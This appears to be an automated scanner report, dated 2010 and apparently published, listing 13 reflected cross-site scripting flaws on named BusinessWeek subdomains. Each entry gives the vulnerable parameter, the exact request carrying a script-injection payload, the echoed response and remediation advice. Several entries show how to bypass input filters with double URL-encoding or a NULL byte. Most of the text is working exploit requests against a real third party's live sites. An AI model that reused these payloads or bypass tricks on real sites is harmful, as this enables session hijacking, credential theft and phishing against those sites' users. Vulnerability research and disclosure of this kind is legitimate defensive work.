XSS, Cross Site Scripting, CWE-79, CAPEC-86, businessweek http systems

1. Cross-site scripting (reflected)

Loading



1.1. http://bx.businessweek.com/topics-a/ [REST URL parameter 1]

1.2. http://bx.businessweek.com/topics-a/ [REST URL parameter 1]

1.3. http://bx.businessweek.com/topics-a/ [REST URL parameter 1]

1.4. http://bx.businessweek.com/topics-a/ [REST URL parameter 1]

1.5. http://feedroom.businessweek.com/ [name of an arbitrarily supplied request parameter]

1.6. http://investing.businessweek.com/research/common/symbollookup/symbollookup.asp [letterIn parameter]

1.7. http://investing.businessweek.com/research/common/symbollookup/symbollookup.asp [letterIn parameter]

1.8. http://investing.businessweek.com/research/common/symbollookup/symbollookup.asp [letterIn parameter]

1.9. http://investing.businessweek.com/research/common/symbollookup/symbollookup.asp [lookuptype parameter]

1.10. http://investing.businessweek.com/research/common/symbollookup/symbollookup.asp [name of an arbitrarily supplied request parameter]

1.11. http://search.businessweek.com/Search [name of an arbitrarily supplied request parameter]

1.12. http://whitepapers.bx.businessweek.com/ [name of an arbitrarily supplied request parameter]

1.13. http://whitepapers.bx.businessweek.com/ [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 13 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://bx.businessweek.com/topics-a/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bx.businessweek.com
Path:   /topics-a/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8210%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8ceed89cd85 was submitted in the REST URL parameter 1. This input was echoed as d8210"><script>alert(1)</script>8ceed89cd85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /topics-ad8210%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8ceed89cd85/ HTTP/1.1
Host: bx.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5
Content-Language: en
X-Powered-By: Servlet/2.4 JSP/2.0
benv: njbweb04
bvh: bx.businessweek.com
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Date: Sat, 20 Nov 2010 14:51:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85165


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

   
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<span title="Browse Topics: AD8210"><SCRIPT>ALERT(1)</SCRIPT>8CEED89CD85">
...[SNIP]...

1.2. http://bx.businessweek.com/topics-a/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bx.businessweek.com
Path:   /topics-a/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 5192e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e167bbc634ea was submitted in the REST URL parameter 1. This input was echoed as 5192e</title><script>alert(1)</script>167bbc634ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /topics-a5192e%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e167bbc634ea/ HTTP/1.1
Host: bx.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5
Content-Language: en
X-Powered-By: Servlet/2.4 JSP/2.0
benv: njbweb04
bvh: bx.businessweek.com
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Date: Sat, 20 Nov 2010 14:51:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85195


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

   
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<title>Browse Topics: A5192E</TITLE><SCRIPT>ALERT(1)</SCRIPT>167BBC634EA - Business Exchange</title>
...[SNIP]...

1.3. http://bx.businessweek.com/topics-a/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bx.businessweek.com
Path:   /topics-a/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e3f5e%253cscript%253ealert%25281%2529%253c%252fscript%253e6dcc67eae42 was submitted in the REST URL parameter 1. This input was echoed as e3f5e<script>alert(1)</script>6dcc67eae42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /topics-ae3f5e%253cscript%253ealert%25281%2529%253c%252fscript%253e6dcc67eae42/ HTTP/1.1
Host: bx.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5
Content-Language: en
X-Powered-By: Servlet/2.4 JSP/2.0
benv: njbweb04
bvh: bx.businessweek.com
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Date: Sat, 20 Nov 2010 14:51:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85155


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

   
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
</SCRIPT>6DCC67EAE42">Browse Topics: AE3F5E<SCRIPT>ALERT(1)</SCRIPT>6DCC67EAE42</span>
...[SNIP]...

1.4. http://bx.businessweek.com/topics-a/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bx.businessweek.com
Path:   /topics-a/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4c06%2522%253balert%25281%2529%252f%252f79481f9450 was submitted in the REST URL parameter 1. This input was echoed as b4c06";alert(1)//79481f9450 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /topics-ab4c06%2522%253balert%25281%2529%252f%252f79481f9450/ HTTP/1.1
Host: bx.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5
Content-Language: en
X-Powered-By: Servlet/2.4 JSP/2.0
benv: njbweb04
bvh: bx.businessweek.com
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Date: Sat, 20 Nov 2010 14:51:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85085


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

   
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<![CDATA[
       window.epulse_content_group="cg1=topic network,cg2=topic list page:AB4C06";ALERT(1)//79481F9450,cg3=topic list:unauthenticated";
       var mv_pageName = "topic list";
       var mv_page = "topic list page:AB4C06";ALERT(1)//79481F9450";
       var mv_user = "unauthenticated";
       var mv_tid = "000000";
       va
...[SNIP]...

1.5. http://feedroom.businessweek.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feedroom.businessweek.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3da90"><script>alert(1)</script>33a75002854 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3da90"><script>alert(1)</script>33a75002854=1 HTTP/1.1
Host: feedroom.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=XVIOVMS10.100.128.104CKOMO; path=/
Date: Sat, 20 Nov 2010 14:55:31 GMT
Server: Apache/2.2.15 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Set-Cookie: fr_puid=112010_095531919_w77a91dc1x12c696ad853xw5b33
Set-Cookie: frC=1
Set-Cookie: JSESSIONID=abcNz08k86CdQbcZgYPXs; path=/
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding,User-Agent
Content-Length: 3083
Connection: close


        <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="all_html">
<head>
<title>The Businessweek V
...[SNIP]...
<script type="text/javascript" language="javascript" src="http://feedroom.businessweek.com/domovoi.jsp;jsessionid=abcNz08k86CdQbcZgYPXs?nsid=a-77a91dc1:12c696ad853:-5b34&3da90"><script>alert(1)</script>33a75002854=1">
...[SNIP]...

1.6. http://investing.businessweek.com/research/common/symbollookup/symbollookup.asp [letterIn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://investing.businessweek.com
Path:   /research/common/symbollookup/symbollookup.asp

Issue detail

The value of the letterIn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fba3"><script>alert(1)</script>a3382fc7225 was submitted in the letterIn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /research/common/symbollookup/symbollookup.asp?letterIn=C6fba3"><script>alert(1)</script>a3382fc7225 HTTP/1.1
Host: investing.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1290264203.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_c22=unknown-www; rsi_segs=; GZIP=1; s_p_s_prop22=unknown-www; gpv_p48=no%20value; s_cc=true; 1663%5F0=AD2311FE216DEC8F62318CDB4CD40B5E; ebNewBandWidth_.investing.businessweek.com=97%3A1290264377146; s_vi=[CS]v1|2673EFA00514877A-4000016500266C74[CE]; __utma=1.1668024259.1290264203.1290264203.1290264203.1; __utmc=1; __qca=P0-1426479591-1290264381306; __utmb=1.2.10.1290264203; SC_LINKS=%5B%5BB%5D%5D;

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Sat, 20 Nov 2010 14:56:45 GMT
Content-Length: 55045
Content-Type: text/html
Expires: Sat, 20 Nov 2010 14:55:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>List of Public Companies Worldwide - BusinessWeek -
...[SNIP]...
<input type="text" id="textBox" name="textIn" value="C6fba3"><script>alert(1)</script>a3382fc7225" size="28" onfocus="if(this.value == 'Enter a symbol or company name')this.value='';" />
...[SNIP]...

1.7. http://investing.businessweek.com/research/common/symbollookup/symbollookup.asp [letterIn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://investing.businessweek.com
Path:   /research/common/symbollookup/symbollookup.asp

Issue detail

The value of the letterIn request parameter is copied into the HTML document as plain text between tags. The payload 8b6b9<script>alert(1)</script>0922a06736a was submitted in the letterIn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /research/common/symbollookup/symbollookup.asp?letterIn=C8b6b9<script>alert(1)</script>0922a06736a HTTP/1.1
Host: investing.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1290264203.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_c22=unknown-www; rsi_segs=; GZIP=1; s_p_s_prop22=unknown-www; gpv_p48=no%20value; s_cc=true; 1663%5F0=AD2311FE216DEC8F62318CDB4CD40B5E; ebNewBandWidth_.investing.businessweek.com=97%3A1290264377146; s_vi=[CS]v1|2673EFA00514877A-4000016500266C74[CE]; __utma=1.1668024259.1290264203.1290264203.1290264203.1; __utmc=1; __qca=P0-1426479591-1290264381306; __utmb=1.2.10.1290264203; SC_LINKS=%5B%5BB%5D%5D;

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Sat, 20 Nov 2010 14:56:45 GMT
Content-Length: 54520
Content-Type: text/html
Expires: Sat, 20 Nov 2010 14:55:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>List of Public Companies Worldwide - BusinessWeek -
...[SNIP]...
<strong>C8b6b9<script>alert(1)</script>0922a06736a</strong>
...[SNIP]...

1.8. http://investing.businessweek.com/research/common/symbollookup/symbollookup.asp [letterIn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://investing.businessweek.com
Path:   /research/common/symbollookup/symbollookup.asp

Issue detail

The value of the letterIn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c89ef"><script>alert(1)</script>7b0fdac9a28 was submitted in the letterIn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /research/common/symbollookup/symbollookup.asp?letterIn=Bc89ef"><script>alert(1)</script>7b0fdac9a28 HTTP/1.1
Host: investing.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1290264203.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_c22=unknown-www; rsi_segs=; GZIP=1; s_p_s_prop22=unknown-www; gpv_p48=no%20value; s_cc=true; 1663%5F0=AD2311FE216DEC8F62318CDB4CD40B5E; ebNewBandWidth_.investing.businessweek.com=97%3A1290264377146; s_vi=[CS]v1|2673EFA00514877A-4000016500266C74[CE]; __utma=1.1668024259.1290264203.1290264203.1290264203.1; __utmc=1; __qca=P0-1426479591-1290264381306; __utmb=1.2.10.1290264203; SC_LINKS=%5B%5BB%5D%5D;

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Sat, 20 Nov 2010 14:56:49 GMT
Content-Length: 59313
Content-Type: text/html
Expires: Sat, 20 Nov 2010 14:55:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>List of Public Companies Worldwide - BusinessWeek -
...[SNIP]...
<input type="text" id="textBox" name="textIn" value="Bc89ef"><script>alert(1)</script>7b0fdac9a28" size="28" onfocus="if(this.value == 'Enter a symbol or company name')this.value='';" />
...[SNIP]...

1.9. http://investing.businessweek.com/research/common/symbollookup/symbollookup.asp [lookuptype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://investing.businessweek.com
Path:   /research/common/symbollookup/symbollookup.asp

Issue detail

The value of the lookuptype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fa6d"><script>alert(1)</script>195b82a465 was submitted in the lookuptype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /research/common/symbollookup/symbollookup.asp?lookuptype=private3fa6d"><script>alert(1)</script>195b82a465&region=all&letterIn=A HTTP/1.1
Host: investing.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1290264203.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_c22=unknown-www; rsi_segs=; GZIP=1; s_p_s_prop22=unknown-www; gpv_p48=no%20value; s_cc=true; 1663%5F0=AD2311FE216DEC8F62318CDB4CD40B5E; ebNewBandWidth_.investing.businessweek.com=97%3A1290264377146; s_vi=[CS]v1|2673EFA00514877A-4000016500266C74[CE]; __utma=1.1668024259.1290264203.1290264203.1290264203.1; __utmc=1; __qca=P0-1426479591-1290264381306; __utmb=1.2.10.1290264203; SC_LINKS=%5B%5BB%5D%5D;

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Sat, 20 Nov 2010 14:57:46 GMT
Content-Length: 86286
Content-Type: text/html
Expires: Sat, 20 Nov 2010 14:56:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>List of Public Companies Worldwide - BusinessWeek,
...[SNIP]...
<a class="link" href="symbollookup.asp?lookuptype=private3fa6d"><script>alert(1)</script>195b82a465&region=all&letterIn=A&firstrow=180">
...[SNIP]...

1.10. http://investing.businessweek.com/research/common/symbollookup/symbollookup.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://investing.businessweek.com
Path:   /research/common/symbollookup/symbollookup.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcad0"><script>alert(1)</script>503e665ac94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /research/common/symbollookup/symbollookup.asp?letterIn=C&bcad0"><script>alert(1)</script>503e665ac94=1 HTTP/1.1
Host: investing.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1290264203.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_c22=unknown-www; rsi_segs=; GZIP=1; s_p_s_prop22=unknown-www; gpv_p48=no%20value; s_cc=true; 1663%5F0=AD2311FE216DEC8F62318CDB4CD40B5E; ebNewBandWidth_.investing.businessweek.com=97%3A1290264377146; s_vi=[CS]v1|2673EFA00514877A-4000016500266C74[CE]; __utma=1.1668024259.1290264203.1290264203.1290264203.1; __utmc=1; __qca=P0-1426479591-1290264381306; __utmb=1.2.10.1290264203; SC_LINKS=%5B%5BB%5D%5D;

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Sat, 20 Nov 2010 14:56:46 GMT
Content-Length: 86441
Content-Type: text/html
Expires: Sat, 20 Nov 2010 14:55:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>List of Public Companies Worldwide - BusinessWeek,
...[SNIP]...
<a class="link" href="symbollookup.asp?letterIn=C&bcad0"><script>alert(1)</script>503e665ac94=1&firstrow=180">
...[SNIP]...

1.11. http://search.businessweek.com/Search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.businessweek.com
Path:   /Search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141cf"><script>alert(1)</script>0cf82cd9208 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search?141cf"><script>alert(1)</script>0cf82cd9208=1 HTTP/1.1
Host: search.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 15:14:04 GMT
Server: Atomz/1.0
Content-Type: text/html; charset=utf-8
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Connection: close
Content-Length: 40653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ba
...[SNIP]...
<input name="sortBy" onclick="if (this.checked) document.location=this.value" value="http://search.businessweek.com/Search?141cf"><script>alert(1)</script>0cf82cd9208=1&i=1&sortby=relevance" id="sortbyrelevance" type="radio" checked="checked" />
...[SNIP]...

1.12. http://whitepapers.bx.businessweek.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.bx.businessweek.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a757"><script>alert(1)</script>50665fb5a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2a757"><script>alert(1)</script>50665fb5a1=1 HTTP/1.1
Host: whitepapers.bx.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 15:27:44 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ss1ekg3unrctr0ntm92h1i7oj3; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: 0ca302bedbca35bbd3966a4cbc547263=7d6218ea197d34ee3e81ca0fa3f70b4f; expires=Sun, 20-Nov-2011 15:27:44 GMT; path=/
Last-Modified: Sat, 20 Nov 2010 15:27:44 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=UTF-8


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" x
...[SNIP]...
<a href="http://ad.vulnerable.ad.partner/jump/mgh.bw.businessexchange/whitepapers;tid=000085;u=000085;url=/?2a757"><script>alert(1)</script>50665fb5a1=1;page=partnerpage;partnerpage=specialtop;sz=980x250,980x115,980x418,980x66,980x110,1x1;tile=2;ord=8534180330" rel="external">
...[SNIP]...

1.13. http://whitepapers.bx.businessweek.com/ [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.bx.businessweek.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5580d'-alert(1)-'b294f53bfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?5580d'-alert(1)-'b294f53bfb=1 HTTP/1.1
Host: whitepapers.bx.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 15:27:46 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=m0rqi01gvd0g10hl1uke1tt2u5; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: 0ca302bedbca35bbd3966a4cbc547263=c200cf46266a72151d7c4263d6ee1cc1; expires=Sun, 20-Nov-2011 15:27:46 GMT; path=/
Last-Modified: Sat, 20 Nov 2010 15:27:46 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=UTF-8


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" x
...[SNIP]...
<scr' + 'ipt src="http://ad.doubleclick.net/adj/mgh.bw.businessexchange/whitepapers;tid=000085;u=000085;url=/?5580d'-alert(1)-'b294f53bfb=1;page=partnerpage;partnerpage=specialtop;sz=980x250,980x115,980x418,980x66,980x110,1x1;tile=2;ord=' + adOrdRandom + '" type="text/javascript">
...[SNIP]...

